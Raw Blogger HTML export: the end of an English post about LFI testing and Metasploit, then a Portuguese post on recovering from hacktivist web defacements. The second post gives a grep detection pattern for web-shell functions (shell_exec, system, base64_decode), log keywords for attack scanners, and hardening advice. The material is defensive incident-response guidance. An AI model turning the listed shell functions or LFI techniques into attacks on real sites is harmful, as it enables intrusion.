white-space: pre-wrap;">The next step, in addition to Part 2, is to write a code that does this same job integrated with Metasploit.</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial, Helvetica, sans-serif;">LFI reference</span> -
<a href="http://hakipedia.com/index.php/Local_File_Inclusion">http://hakipedia.com/index.php/Local_File_Inclusion</a><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Any questions #dclabs @ freenode</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Twitter: @crashbrz</span></span><span style="background-color: white; font-family: Arial; font-size: 15px; white-space: pre-wrap;">Thank's all for english revision
</span><br class="kix-line-break" style="background-color: white; font-family: Arial; font-size: 15px; white-space: pre-wrap;" /><span style="background-color: white; font-family: Arial; font-size: 15px; white-space: pre-wrap;">Cya folks!</span>
</span></div>
<div>
<span style="background-color: white; font-family: Arial; font-size: 15px; white-space: pre-wrap;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://3.gvt0.com/vi/z357C_8H3Mc/0.jpg" height="266" width="320"><param name="movie" value="http://www.youtube.com/v/z357C_8H3Mc&fs=1&source=uds" />
<param name="bgcolor" value="#FFFFFF" />
<embed width="320" height="266" src="http://www.youtube.com/v/z357C_8H3Mc&fs=1&source=uds" type="application/x-shockwave-flash"></embed></object></div>
<div>
<span style="background-color: white;"><span style="font-family: Arial;"><span style="font-size: 15px; white-space: pre-wrap;"><br /></span></span></span><span style="background-color: #fafafa; color: #333333; font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2185986060583872831.post-5469895720005231962012-01-01T06:02:00.000-08:002012-01-01T08:34:17.333-08:00Como sobreviver aos ataques de "hacktivistas" e pichadores virtuais de plantão<div style="text-align: left;">
Em 2011 as atividades hackers foram bastante divulgadas e passaram de mera brincadeira de jovens desocupados para ações "organizadas" com cunho político libertário.
Os grupos que ganharam um rápido prestigio foram o Anonymous e LuLzSec, uma boa parte do marketing em cima das ações destes grupos ficou a cargo das redes sociais, pastebin e do youtube. A partir dai novas facções como AnonymousBR, iPiratesGroup, LuLzSecBR, GreyHatBR, AntiSecBR e alguns <a href="http://brainsniffer.blogspot.com/2011/12/mais-uma-previsao-de-seguranca-em-2012.html">pichadores virtuais</a> foram surgindo em busca de seus 15 min de fama. Analisando os resultados divulgados não é dificil entender o porque de tanto sucesso. Identifiquei erros simples como senhas fracas no ambiente de administação do sites ( e.g. admin@dominio/manager ) e muito mas muito SQLi e Blind SQLi. Abaixo passo algumas dicas de como sobreviver após o comprometimento de sua infra-estrutura e como mitigar as falhas.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<a href="http://blog.alexos.com.br/wp-content/uploads/2011/12/Anonymous-Seguran%C3%A7a-Hackers-Hacktivistas.jpg"><img alt="" class="alignleft size-medium wp-image-2828" height="199" src="http://blog.alexos.com.br/wp-content/uploads/2011/12/Anonymous-Segurança-Hackers-Hacktivistas-300x199.jpg" title="Anonymous-Segurança-Hackers-Hacktivistas" width="300" /></a></div>
<br />
<div style="text-align: left;">
<span style="font-weight: bold;"><br /></span></div>
<strong></strong><br />
<div style="text-align: left;">
<strong style="font-weight: bold;">1 - Web Backdoors</strong>
<br /><br /> Os web shells<a href="http://www.darknet.org.uk/2007/03/a-collection-of-web-backdoors-shells-cmdasp-cmdjsp-jsp-reverse-php-backdoor/">[1]</a> <a href="http://code.google.com/p/weevely/">[2]</a> permitem o acesso ao ambiente comprometido mesmo após corrigidas as falhas. Estudar o código destas ferramentas facilita sua detecção e remoção.
Nestes casos um AV ajuda muito tanto no Ambiente Windows quanto no Linux, mas muito cuidado pois nem todos os AVs são capazes de detectar web backdoors bastantes conhecidos ( e.g Symantec ). Uma forma de validar a varredura é fazendo buscas manuais:
<em>No Linux</em></div>
<strong>
</strong><br />
<blockquote>
<div style="text-align: left;">
grep -RPl --include=*.{php,txt,asp} "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile) *\(" /var/www/
</div>
</blockquote>
<div style="text-align: left;">
<em>No Windows</em>
Usando a ferramenta de busca procure pelas palavras acima.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<strong>2 - Análise do alvo</strong>
<br /><br /> Após o incidente é muito importante entender quais foram as vulnerabilidades que permitiram a invasão. Ferramentas para análise de vulnerabilidades como o <a href="http://www.nessus.org/">Nessus</a>, <a href="http://arachni.segfault.gr/">Arachni</a>, <a href="http://www.uniscan.com.br/">Uniscan</a>, <a href="http://www.acunetix.com/">Acunetix</a> são de fundamental importância, pois elas indicam as possíveis portas de entrada e facilitam a criação do plano de mitigação.
Auditar o banco de dados é de extrema importância já que entradas indevidas podem ser adicionadas ( e.g contas fantasmas), e alguns lixos do ataque.
</div>
<br />
<div style="text-align: left;">
<span style="font-weight: bold;"><br /></span></div>
<strong></strong><br />
<div style="text-align: left;">
<strong><strong>3 - Proteção extra e monitoramento</strong>
</strong><br />Aplicar uma camada a mais de segurança permite dificultar as tentativas de ataque não permitindo a varredura em busca de vulnerabilidades e portas abertas. Não deixe essa responsabilidade somente a cargo da ferramenta de proteção de borda ( e.g IPS ), por ela ser baseada em <a href="http://en.wikipedia.org/wiki/Pattern_matching">Pattern matching</a> nem todos os ataques serão bloqueados e muito cuidado com os falsos positivos já que uma aplicação com falha no código fará com que o IPS entenda qualquer requisição como maliciosa, auditar todos os alertas muitas vezes sem bloqueá-los é o mais recomendado.
O <a href="http://www.ossec.net/">Ossec</a> juntamente com o <a href="http://www.splunk.com/product">Splunk</a>, <a href="http://blog.alexos.com.br/?p=2717">Portsentry</a>, <a href="http://www.la-samhna.de/samhain/">Samhaim</a> e o <a href="http://www.modsecurity.org/">ModSecurity</a> são ferramentas que auxiliam bastante nesta tarefa. Outro hábito pouco utilizado é a análise dos logs, uma simples busca por palavras como <em>Nikto, Havij, perl, whitehat, Uniscan, acunetix, fuck, scanner, timthumb, pma, phpmyadmin</em> nos logs do Apache e do IIS permitem identificar algumas tentativas de ataque.</div>
<strong>
</strong><br />
<br />
<div style="text-align: left;">
<span style="font-weight: bold;"><br /></span></div>
<strong></strong><br />
<div style="text-align: left;">
<strong style="font-weight: bold;">4 - Atualização e restrição de acesso</strong><b> </b><br />Manter o ambiente atualizado é uma boa prática pouco utilizada muito mais por medo principalmente quando o ambiente é de alta criticidade ( e.g SGBDs ). Nos ambientes Linux o <a href="http://blog.alexos.com.br/?p=1501">cron-apt</a> (Debian e derivados) e o <a href="http://spacewalk.redhat.com/">Spacewalk</a> (RedHat e derivados) ajudam muito, os sistemas Windows contam com o velho WSUS que geralmente fica esquecido sem a devida atenção.
Restringir o acesso aos ambientes administrativos do site ( e.g wp-admin, admin, administration ) e o FTP evitando assim ataques de brute-force, outra boa prática é a utilização de senhas fortes, isto soa bastante clichê, porém após analisar algumas áreas administrativas encontrei senhas ridiculas de acesso.
Conclusão
Estas dicas apenas mostram o caminho a ser seguido. Experiência, bom senso e estudo continuo são fatores que diferenciam na resolução dos incidentes e na prevenção.</div>
<br />
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Última dica: <strong>FERRAMENTAS FALHAM</strong>.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="background-color: #fafafa; color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 19px; text-align: justify;">Post by: @alexandrosilva</span></div>Unknownnoreply@blogger.com1